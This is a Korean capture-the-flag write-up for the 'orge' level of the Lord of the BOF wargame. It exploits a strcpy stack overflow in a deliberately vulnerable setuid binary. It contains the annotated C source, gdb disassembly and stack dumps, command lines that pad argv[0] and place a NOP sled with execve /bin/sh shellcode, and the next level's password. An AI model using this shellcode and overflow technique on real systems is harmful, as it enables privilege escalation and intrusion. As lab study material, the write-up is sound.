darkelf / kernel crashed 로 접속
bash2
orge.c
[darkelf@localhost darkelf]$ cat orge.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/* Entry point of the challenge binary.
 * Implicit `int` return type (pre-C99 style); strlen/memset/strcpy are used without
 * <string.h>, so this only builds where the toolchain accepts implicit declarations.
 * Kept byte-for-byte: the stack layout of this exact body is what the rest of the
 * page analyses (the disassembly below places buffer at [ebp-40]). */
main(int argc, char *argv[])
{
char buffer[40]; /* 40-byte local; the only write into it is the unbounded strcpy below */
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// here is changed!
// New constraint vs. the previous level: the program path as invoked (argv[0]) must be exactly 77 bytes.
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
// egghunter
// Zeroes every environment string in place, so nothing supplied via the environment survives into later code.
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
// Reads byte 47 of argv[1] before its length is checked; a shorter argv[1] makes this read past its terminator.
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
// Caps argv[1] at 48 characters, but buffer holds only 40: the strcpy below can write up to
// 9 bytes (48 characters plus the NUL) past the end of buffer. This is the memory-safety
// defect; a bounded copy such as snprintf(buffer, sizeof buffer, "%s", argv[1]) would remove it.
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]); /* overflow point: source length is not bounded by sizeof buffer */
printf("%s\n", buffer);
// buffer hunter
// Clears the local buffer after printing so its contents do not remain on the stack.
memset(buffer, 0, 40);
}
저번 문제와 같은 조건에
이 부분이 추가되었다.
// here is changed!
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
argv[0]은 ./orge부분일텐데 어떻게 77바이트를 맞추는지 모르겠어서 찾아보았다.
심볼릭 링크를 사용하거나 혹은 /를 추가로 사용한다.(/은 많이 와도 상관이 없다고 한다.)
다음과 같은 방법을 사용했다. 테스트했는데 argv[0] error가 나지않았다.
[darkelf@localhost darkelf]$ `python -c 'print "./"+"/"*71+"orge"'` hello
stack is still your friend.
gdb를 orge2로 실행시켰다가 argv[0] 길이를 어떻게 맞춰야할지 모르겠어서 이름을 A*77로 바꾸고 다시 실행시켜주었다.
[darkelf@localhost darkelf]$ rename orge2 `python -c 'print "A"*77'` orge2
[darkelf@localhost darkelf]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
orge
orge.c
[darkelf@localhost darkelf]$ gdb -q `python -c 'print "A"*77'`
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
...
0x80485dd <main+221>: mov %edx,DWORD PTR [%eax]
0x80485df <main+223>: push %edx
0x80485e0 <main+224>: call 0x80483f0 <strlen>
0x80485e5 <main+229>: add %esp,4
0x80485e8 <main+232>: mov %eax,%eax
0x80485ea <main+234>: cmp %eax,48
0x80485ed <main+237>: jbe 0x8048606 <main+262>
0x80485ef <main+239>: push 0x80486c8
0x80485f4 <main+244>: call 0x8048410 <printf>
0x80485f9 <main+249>: add %esp,4
0x80485fc <main+252>: push 0
0x80485fe <main+254>: call 0x8048420 <exit>
0x8048603 <main+259>: add %esp,4
0x8048606 <main+262>: mov %eax,DWORD PTR [%ebp+12]
0x8048609 <main+265>: add %eax,4
0x804860c <main+268>: mov %edx,DWORD PTR [%eax]
0x804860e <main+270>: push %edx
0x804860f <main+271>: lea %eax,[%ebp-40]
0x8048612 <main+274>: push %eax
0x8048613 <main+275>: call 0x8048440 <strcpy>
0x8048618 <main+280>: add %esp,8
0x804861b <main+283>: lea %eax,[%ebp-40]
0x804861e <main+286>: push %eax
---Type <return> to continue, or q <return> to quit---
0x804861f <main+287>: push 0x80486df
0x8048624 <main+292>: call 0x8048410 <printf>
0x8048629 <main+297>: add %esp,8
0x804862c <main+300>: push 40
0x804862e <main+302>: push 0
0x8048630 <main+304>: lea %eax,[%ebp-40]
0x8048633 <main+307>: push %eax
0x8048634 <main+308>: call 0x8048430 <memset>
0x8048639 <main+313>: add %esp,12
0x804863c <main+316>: leave
0x804863d <main+317>: ret
0x804863e <main+318>: nop
0x804863f <main+319>: nop
End of assembler dump.
main+280에 bp를 걸겠다.
실행하려다가 이름을 잘못 바꿨다는 걸 깨달았다. 실행될 때 /home/darkelf/이름 으로 실행되니 13바이트를 뺀 A로 다시 저장했다. gdb를 다시 실행하고 조건에 맞게 실행시켰다.
(gdb) r `python -c 'print "\xbf"*48'` `python -c 'print "B"*100'`
Starting program: /home/darkelf/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA `python -c 'print "\xbf"*48'` `python -c 'print "B"*100'`
Breakpoint 1, 0x8048618 in main ()
(gdb) x/200x $esp
0xbffff9d4: 0xbffff9e0 0xbffffba1 0x00000015 0xbfbfbfbf
0xbffff9e4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffff9f4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffa04: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0x00000000
0xbffffa14: 0xbffffa54 0xbffffa64 0x40013868 0x00000003
0xbffffa24: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffa34: 0x00000003 0xbffffa54 0x08048390 0x0804866c
0xbffffa44: 0x4000ae60 0xbffffa4c 0x40013e90 0x00000003
0xbffffa54: 0xbffffb53 0xbffffba1 0xbffffbd2 0x00000000
0xbffffa64: 0xbffffc37 0xbffffc59 0xbffffc63 0xbffffc71
0xbffffa74: 0xbffffc90 0xbffffca0 0xbffffcb9 0xbffffcd6
0xbffffa84: 0xbffffcf5 0xbffffd00 0xbffffd0e 0xbffffd51
0xbffffa94: 0xbffffd64 0xbffffd79 0xbffffd89 0xbffffd96
0xbffffaa4: 0xbffffdb5 0xbffffdc0 0xbffffdd1 0xbffffde3
0xbffffab4: 0xbffffdeb 0x00000000 0x00000003 0x08048034
0xbffffac4: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffad4: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffae4: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffffaf4: 0x0000000b 0x000001fa 0x0000000c 0x000001fa
0xbffffb04: 0x0000000d 0x000001fa 0x0000000e 0x000001fa
0xbffffb14: 0x00000010 0x0f8bfbff 0x0000000f 0xbffffb4e
0xbffffb24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb34: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffb44: 0x00000000 0x00000000 0x36690000 0x2f003638
0xbffffb54: 0x656d6f68 0x7261642f 0x666c656b 0x4141412f
0xbffffb64: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb74: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb84: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb94: 0x41414141 0x41414141 0x41414141 0xbfbfbf00
0xbffffba4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffbb4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffbc4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0x424200bf
0xbffffbd4: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffbe4: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffbf4: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc04: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc14: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc24: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc34: 0x00004242 0x00000000 0x00000000 0x00000000
0xbffffc44: 0x00000000 0x00000000 0x00000000 0x00000000
...
0xbffffc04의 주소로 넣겠다.
`python -c 'print "."+"/"*72+"orge"'` `python -c 'print "A"*44+"\x04\xfc\xff\xbf "+"\x90"*10000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
계속되는 실패로 인해 그냥 심볼릭 링크를 만들기로 했다.
ln -s orge `python -c 'print "A"*75'`
다시 조건에 맞춰서 argv[2]에 nop와 쉘코드를 넣었다.
`python -c 'print "./"+"B"*75'` `python -c 'print "A"*47+"\xbf "+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Segmentation fault (core dumped)
core 분석
[darkelf@localhost darkelf]$ gdb -c core -q
Core was generated by `./BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB A'.
Program terminated with signal 11, Segmentation fault.
#0 0xbf414141 in ?? ()
(gdb) x/200x $esp
0xbffff630: 0x00000000 0xbffff674 0xbffff684 0x40013868
0xbffff640: 0x00000003 0x08048450 0x00000000 0x08048471
0xbffff650: 0x08048500 0x00000003 0xbffff674 0x08048390
0xbffff660: 0x0804866c 0x4000ae60 0xbffff66c 0x40013e90
0xbffff670: 0x00000003 0xbffff766 0xbffff7b4 0xbffff7e5
0xbffff680: 0x00000000 0xbffffbe7 0xbffffbf9 0xbffffc12
0xbffff690: 0xbffffc31 0xbffffc53 0xbffffc60 0xbffffe23
0xbffff6a0: 0xbffffe42 0xbffffe5f 0xbffffe74 0xbffffe93
0xbffff6b0: 0xbffffe9e 0xbffffeae 0xbffffeb6 0xbffffec0
0xbffff6c0: 0xbffffed0 0xbffffede 0xbffffeec 0xbffffefd
0xbffff6d0: 0xbfffff08 0xbfffff1b 0xbfffff5e 0x00000000
0xbffff6e0: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffff6f0: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffff700: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffff710: 0x00000009 0x08048450 0x0000000b 0x000001fa
0xbffff720: 0x0000000c 0x000001fa 0x0000000d 0x000001fa
0xbffff730: 0x0000000e 0x000001fa 0x00000010 0x0f8bfbff
0xbffff740: 0x0000000f 0xbffff761 0x00000000 0x00000000
0xbffff750: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff760: 0x38366900 0x2f2e0036 0x42424242 0x42424242
0xbffff770: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff780: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff790: 0x42424242 0x42424242 0x42424242 0x42424242
---Type <return> to continue, or q <return> to quit---
0xbffff7a0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff7b0: 0x00424242 0x41414141 0x41414141 0x41414141
0xbffff7c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7e0: 0xbf414141 0x90909000 0x90909090 0x90909090
0xbffff7f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff800: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff810: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff820: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff830: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff840: 0x90909090 0x90909090 0x90909090 0x90909090
...
nop가 들어있는 주소 중 하나인 0xbffff830을 넣어보겠다.
dummy(44) + nop 주소 + nop(1000) + shellcode
[darkelf@localhost darkelf]$ `python -c 'print "./"+"A"*75'` `python -c 'print "A"*44+"\x30\xf8\xff\xbf "+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0??
bash$ my-pass
euid = 507
timewalker
드디어 공격에 성공했다!!!
timewalker